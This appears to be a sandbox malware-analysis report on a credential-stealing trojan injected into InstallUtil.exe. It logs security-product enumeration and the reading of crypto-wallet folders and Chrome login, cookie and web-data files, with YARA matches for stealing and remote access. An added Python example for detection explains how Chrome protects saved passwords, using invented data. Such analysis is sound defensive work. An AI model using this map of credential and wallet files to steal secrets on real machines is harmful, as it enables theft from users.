Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d20420.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.444228433.0000000003D98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
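The four Chrome files opened above are SQLite databases, and "Login Data" is the one holding saved credentials. The Python below is an added example, not Joe Sandbox or sample code: it builds a constructed in-memory copy of the logins table using Chrome's column names and invented rows, then inventories what a reader of that file actually gets: origin, username, and a ciphertext whose prefix tells you how it was protected. Values prefixed v10 are AES-256-GCM under a per-profile key that is itself DPAPI-wrapped in the profile's "Local State" file; older values are raw DPAPI blobs under the user's logon secret. The defender's takeaway is that the database alone yields origins and usernames but not passwords, so a process other than the browser opening Login Data together with Local State (or calling DPAPI on its contents) is the high-signal combination.

```python
"""What a reader of Chrome's 'Login Data' sees.  Added example; the table is
constructed in memory with Chrome's column names and invented rows, not data
from the report."""
import sqlite3

# DPAPI blobs start with version 1 and the provider GUID DF9D8CD0-1501-11D1-8C7A-00C04FC297EB.
DPAPI_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
# Chrome marks values sealed with its per-profile AES-256-GCM key by a "v10"
# prefix, followed by the 12-byte nonce, the ciphertext and the 16-byte GCM tag.
V10_PREFIX = b"v10"

# Invented ciphertexts of the right shape (not decryptable; there is no key).
SAMPLE_V10 = V10_PREFIX + bytes(range(12)) + b"\x5a" * 8 + b"\xa5" * 16
SAMPLE_DPAPI = DPAPI_MAGIC + b"\x00" * 24


def classify_blob(blob: bytes) -> str:
    """Name the protection scheme from the ciphertext prefix alone."""
    if not blob:
        return "empty"
    if blob.startswith(V10_PREFIX):
        return "aes-gcm (profile key in Local State, DPAPI-wrapped)"
    if blob.startswith(DPAPI_MAGIC):
        return "dpapi (user logon secret)"
    return "unknown"


def build_sample_login_data() -> sqlite3.Connection:
    """Constructed stand-in for the on-disk database (same columns, invented rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    conn.executemany("INSERT INTO logins VALUES (?, ?, ?)", [
        ("https://mail.example.test/login", "alice", SAMPLE_V10),
        ("https://legacy.example.test/", "bob", SAMPLE_DPAPI),
        ("https://blank.example.test/", "carol", b""),
    ])
    return conn


def inventory_logins(conn: sqlite3.Connection):
    """Return (origin, username, scheme) per row: what is readable without a key."""
    rows = conn.execute("SELECT origin_url, username_value, password_value FROM logins")
    return [(url, user, classify_blob(bytes(pw))) for url, user, pw in rows]


if __name__ == "__main__":
    for row in inventory_logins(build_sample_login_data()):
        print(row)
```

On a live system the running browser holds these files locked, which is why stealers copy them before opening; a copy of Login Data appearing under %TEMP% or in the stealer's working directory is another artifact worth checking for during response.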
Source: Yara match File source: 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d20420.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: dump.pcap, type: PCAP